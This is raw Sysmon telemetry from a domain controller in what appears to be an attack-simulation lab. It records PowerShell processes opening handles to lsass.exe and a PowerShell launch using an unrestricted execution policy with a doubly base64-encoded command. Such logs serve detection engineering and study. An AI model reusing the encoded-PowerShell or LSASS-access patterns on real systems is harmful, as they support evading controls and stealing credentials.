13:33:12.106{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:13.168{59A5CD1D-8CA9-6005-1100-00000000A201}1184C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0x7839f7dc) 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.950{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.950{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.903{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qnuiti4x.r3v.ps12021-01-18 13:33:14.903 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.887{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8E18-6005-BD02-00000000A201}23402628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95c9331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+950f4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95152edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95128356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95134889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9513447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511a2a7(wow64) 154100x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.868{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 